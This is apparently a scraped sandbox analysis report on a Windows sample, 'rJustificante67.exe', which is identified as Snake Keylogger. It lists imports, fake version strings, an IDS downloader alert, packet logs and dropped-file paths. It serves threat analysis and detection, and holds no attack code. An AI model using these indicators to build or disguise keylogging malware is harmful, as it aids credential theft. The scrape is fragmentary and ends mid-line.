USER32.dll	EndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll	RegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
VERSION.dll	GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Version Infos

Description	Data
Comments	esdragol
CompanyName	heliographer tomotorersflys
FileDescription	drfyldings
LegalCopyright	forraa dalsnknings
ProductVersion	2.5.0.0
Translation	0x0409 0x04e4

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-02-17T23:02:12.643085+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.6	49969	142.250.185.78	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 17, 2025 23:02:11.141268015 CET	49969	443	192.168.2.6	142.250.185.78
Feb 17, 2025 23:02:11.141328096 CET	443	49969	142.250.185.78	192.168.2.6
Feb 17, 2025 23:02:11.141407013 CET	49969	443	192.168.2.6	142.250.185.78
Feb 17, 2025 23:02:11.181569099 CET	49969	443	192.168.2.6	142.250.185.78
Feb 17, 2025 23:02:11.181605101 CET	443	49969	142.250.185.78	192.168.2.6
Feb 17, 2025 23:02:11.829004049 CET	443	49969	142.250.185.78	192.168.2.6
Feb 17, 2025 23:02:11.829101086 CET	49969	443	192.168.2.6	142.250.185.78
Feb 17, 2025 23:02:11.830086946 CET	443	49969	142.250.185.78	192.168.2.6
Feb 17, 2025 23:02:11.830136061 CET	49969	443	192.168.2.6	142.250.185.78
Feb 17, 2025 23:02:12.333264112 CET	49969	443	192.168.2.6	142.250.185.78
Feb 17, 2025 23:02:12.333344936 CET	443	49969	142.250.185.78	192.168.2.6
Feb 17, 2025 23:02:12.333761930 CET	443	49969	142.250.185.78	192.168.2.6
Feb 17, 2025 23:02:12.333828926 CET	49969	443	192.168.2.6	142.250.185.78
Feb 17, 2025 23:02:12.340908051 CET	49969	443	192.168.2.6	142.250.185.78
Feb 17, 2025 23:02:12.383338928 CET	443	49969	142.250.185.78	192.168.2.6
Feb 17, 2025 23:02:12.643132925 CET	443	49969	142.250.185.78	192.168.2.6
Feb 17, 2025 23:02:12.643215895 CET	49969	443	192.168.2.6	142.250.185.78
Feb 17, 2025 23:02:12.643244028 CET	443	49969	142.250.185.78	192.168.2.6
Feb 17, 2025 23:02:12.643261909 CET	443	49969	142.250.185.78	192.168.2.6
Feb 17, 2025 23:02:12.643287897 CET	49969	443	192.168.2.6	142.250.185.78
Feb 17, 2025 23:02:12.643342018 CET	49969	443	192.168.2.6	142.250.185.78
Feb 17, 2025 23:02:12.643580914 CET	49969	443	192.168.2.6	142.250.185.78
Feb 17, 2025 23:02:12.643604040 CET	443	49969	142.250.185.78	192.168.2.6
Feb 17, 2025 23:02:12.643624067 CET	49969	443	192.168.2.6	142.250.185.78
Feb 17, 2025 23:02:12.643649101 CET	49969	443	192.168.2.6	142.250.185.78
Feb 17, 2025 23:02:12.670177937 CET	49976	443	192.168.2.6	216.58.212.129
Feb 17, 2025 23:02:12.670195103 CET	443	49976	216.58.212.129	192.168.2.6
Feb 17, 2025 23:02:12.670253992 CET	49976	443	192.168.2.6	216.58.212.129
Feb 17, 2025 23:02:12.670577049 CET	49976	443	192.168.2.6	216.58.212.129
Feb 17, 2025 23:02:12.670595884 CET	443	49976	216.58.212.129	192.168.2.6
Feb 17, 2025 23:02:13.315561056 CET	443	49976	216.58.212.129	192.168.2.6
Feb 17, 2025 23:02:13.315640926 CET	49976	443	192.168.2.6	216.58.212.129
Feb 17, 2025 23:02:13.321002007 CET	49976	443	192.168.2.6	216.58.212.129
Feb 17, 2025 23:02:13.321007967 CET	443	49976	216.58.212.129	192.168.2.6
Feb 17, 2025 23:02:13.321266890 CET	443	49976	216.58.212.129	192.168.2.6
Feb 17, 2025 23:02:13.321331024 CET	49976	443	192.168.2.6	216.58.212.129
Feb 17, 2025 23:02:13.328380108 CET	49976	443	192.168.2.6	216.58.212.129
Feb 17, 2025 23:02:13.375334024 CET	443	49976	216.58.212.129	192.168.2.6
Feb 17, 2025 23:02:15.918148994 CET	443	49976	216.58.212.129	192.168.2.6
Feb 17, 2025 23:02:15.918281078 CET	49976	443	192.168.2.6	216.58.212.129
Feb 17, 2025 23:02:15.918324947 CET	443	49976	216.58.212.129	192.168.2.6
Feb 17, 2025 23:02:15.918384075 CET	49976	443	192.168.2.6	216.58.212.129
Feb 17, 2025 23:02:15.932833910 CET	443	49976	216.58.212.129	192.168.2.6
Feb 17, 2025 23:02:15.932950974 CET	49976	443	192.168.2.6	216.58.212.129
Feb 17, 2025 23:02:15.933016062 CET	443	49976	216.58.212.129	192.168.2.6
Feb 17, 2025 23:02:15.933084011 CET	49976	443	192.168.2.6	216.58.212.129
Feb 17, 2025 23:02:16.004417896 CET	443	49976	216.58.212.129	192.168.2.6
Feb 17, 2025 23:02:16.004606009 CET	49976	443	192.168.2.6	216.58.212.129
Feb 17, 2025 23:02:16.004626989 CET	443	49976	216.58.212.129	192.168.2.6
Feb 17, 2025 23:02:16.004657984 CET	443	49976	216.58.212.129	192.168.2.6
Feb 17, 2025 23:02:16.004684925 CET	49976	443	192.168.2.6	216.58.212.129
Feb 17, 2025 23:02:16.004729033 CET	49976	443	192.168.2.6	216.58.212.129
Feb 17, 2025 23:02:16.006906986 CET	443	49976	216.58.212.129	192.168.2.6
Feb 17, 2025 23:02:16.006998062 CET	49976	443	192.168.2.6	216.58.212.129
Feb 17, 2025 23:02:16.007016897 CET	443	49976	216.58.212.129	192.168.2.6
Feb 17, 2025 23:02:16.007086992 CET	49976	443	192.168.2.6	216.58.212.129
Feb 17, 2025 23:02:16.013286114 CET	443	49976	216.58.212.129	192.168.2.6
Feb 17, 2025 23:02:16.013375044 CET	49976	443	192.168.2.6	216.58.212.129
Feb 17, 2025 23:02:16.013389111 CET	443	49976	216.58.212.129	192.168.2.6
Feb 17, 2025 23:02:16.013453007 CET	49976	443	192.168.2.6	216.58.212.129
Feb 17, 2025 23:02:16.019591093 CET	443	49976	216.58.212.129	192.168.2.6
Feb 17, 2025 23:02:16.019659042 CET	49976	443	192.168.2.6	216.58.212.129
Feb 17, 2025 23:02:16.019671917 CET	443	49976	216.58.212.129	192.168.2.6
Feb 17, 2025 23:02:16.019726992 CET	49976	443	192.168.2.6	216.58.212.129
Feb 17, 2025 23:02:16.025815010 CET	443	49976	216.58.212.129	192.168.2.6
Feb 17, 2025 23:02:16.025867939 CET	49976	443	192.168.2.6	216.58.212.129
Feb 17, 2025 23:02:16.025882006 CET	443	49976	216.58.212.129	192.168.2.6
Feb 17, 2025 23:02:16.025934935 CET	49976	443	192.168.2.6	216.58.212.129
Feb 17, 2025 23:02:16.032150984 CET	443	49976	216.58.212.129	192.168.2.6
Feb 17, 2025 23:02:16.032207012 CET	49976	443	192.168.2.6	216.58.212.129
Feb 17, 2025 23:02:16.032222986 CET	443	49976	216.58.212.129	192.168.2.6
Feb 17, 2025 23:02:16.032274961 CET	49976	443	192.168.2.6	216.58.212.129
Feb 17, 2025 23:02:16.037851095 CET	443	49976	216.58.212.129	192.168.2.6
Feb 17, 2025 23:02:16.037904978 CET	49976	443	192.168.2.6	216.58.212.129
Feb 17, 2025 23:02:16.037923098 CET	443	49976	216.58.212.129	192.168.2.6
Feb 17, 2025 23:02:16.037983894 CET	49976	443	192.168.2.6	216.58.212.129
Feb 17, 2025 23:02:16.044219017 CET	443	49976	216.58.212.129	192.168.2.6
Feb 17, 2025 23:02:16.044290066 CET	49976	443	192.168.2.6	216.58.212.129
Feb 17, 2025 23:02:16.044305086 CET	443	49976	216.58.212.129	192.168.2.6
Feb 17, 2025 23:02:16.044364929 CET	49976	443	192.168.2.6	216.58.212.129
Feb 17, 2025 23:02:16.049309015 CET	443	49976	216.58.212.129	192.168.2.6
Feb 17, 2025 23:02:16.049393892 CET	49976	443	192.168.2.6	216.58.212.129
Feb 17, 2025 23:02:16.049407005 CET	443	49976	216.58.212.129	192.168.2.6
Feb 17, 2025 23:02:16.049463987 CET	49976	443	192.168.2.6	216.58.212.129
Feb 17, 2025 23:02:16.054919004 CET	443	49976	216.58.212.129	192.168.2.6
Feb 17, 2025 23:02:16.054981947 CET	49976	443	192.168.2.6	216.58.212.129
Feb 17, 2025 23:02:16.055016994 CET	443	49976	216.58.212.129	192.168.2.6
Feb 17, 2025 23:02:16.055075884 CET	49976	443	192.168.2.6	216.58.212.129
Feb 17, 2025 23:02:16.069958925 CET	443	49976	216.58.212.129	192.168.2.6
Feb 17, 2025 23:02:16.070051908 CET	49976	443	192.168.2.6	216.58.212.129
Feb 17, 2025 23:02:16.070086956 CET	443	49976	216.58.212.129	192.168.2.6
Feb 17, 2025 23:02:16.070151091 CET	49976	443	192.168.2.6	216.58.212.129
Feb 17, 2025 23:02:16.070174932 CET	443	49976	216.58.212.129	192.168.2.6
Feb 17, 2025 23:02:16.070225954 CET	49976	443	192.168.2.6	216.58.212.129
Feb 17, 2025 23:02:16.091000080 CET	443	49976	216.58.212.129	192.168.2.6
Feb 17, 2025 23:02:16.091058969 CET	49976	443	192.168.2.6	216.58.212.129
Feb 17, 2025 23:02:16.091074944 CET	443	49976	216.58.212.129	192.168.2.6
Feb 17, 2025 23:02:16.091135025 CET	49976	443	192.168.2.6	216.58.212.129
Feb 17, 2025 23:02:16.091146946 CET	443	49976	216.58.212.129	192.168.2.6
Feb 17, 2025 23:02:16.091197014 CET	49976	443	192.168.2.6	216.58.212.129
Feb 17, 2025 23:02:16.091208935 CET	443	49976	216.58.212.129	192.168.2.6
Feb 17, 2025 23:02:16.091255903 CET	49976	443	192.168.2.6	216.58.212.129
Feb 17, 2025 23:02:16.091454983 CET	443	49976	216.58.212.129	192.168.2.6
Feb 17, 2025 23:02:16.091502905 CET	49976	443	192.168.2.6	216.58.212.129
Feb 17, 2025 23:02:16.093210936 CET	443	49976	216.58.212.129	192.168.2.6
Feb 17, 2025 23:02:16.093262911 CET	49976	443	192.168.2.6	216.58.212.129
Feb 17, 2025 23:02:16.093616962 CET	443	49976	216.58.212.129	192.168.2.6
Feb 17, 2025 23:02:16.093669891 CET	49976	443	192.168.2.6	216.58.212.129
Feb 17, 2025 23:02:16.098891973 CET	443	49976	216.58.212.129	192.168.2.6
Feb 17, 2025 23:02:16.098952055 CET	49976	443	192.168.2.6	216.58.212.1

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report rJustificante67.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\Templates\dinosaurusserne.lnk

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rJustificante67._c4df9bb712b3118345ad690a5b5e0fe30be12_b08b1bae_c9ad89c2-4d51-49d3-b650-e8fc15a3e926\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4393.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4549.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER456A.tmp.xml

C:\Users\Public\Documents\stempelpudernes.lnk

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\premierminister\raastofindvindinger\pulpitical\Flushes.Des

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\premierminister\raastofindvindinger\pulpitical\Furciform\Afguderiets150.txt

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\premierminister\raastofindvindinger\pulpitical\Furciform\Brudnes.Met2

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\premierminister\raastofindvindinger\pulpitical\Furciform\Catadicrotic.txt

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\premierminister\raastofindvindinger\pulpitical\Furciform\Uligevgten\Devoutnesses.txt

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\premierminister\raastofindvindinger\pulpitical\Furciform\Uligevgten\Fibrocartilaginous.eut

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\premierminister\raastofindvindinger\pulpitical\Furciform\Uligevgten\Flugtningerne.con

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\premierminister\raastofindvindinger\pulpitical\Furciform\Uligevgten\Parkgsterne.jpg

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\premierminister\raastofindvindinger\pulpitical\Furciform\Uligevgten\Unhealthfully.fet

Windows Analysis Report
rJustificante67.exe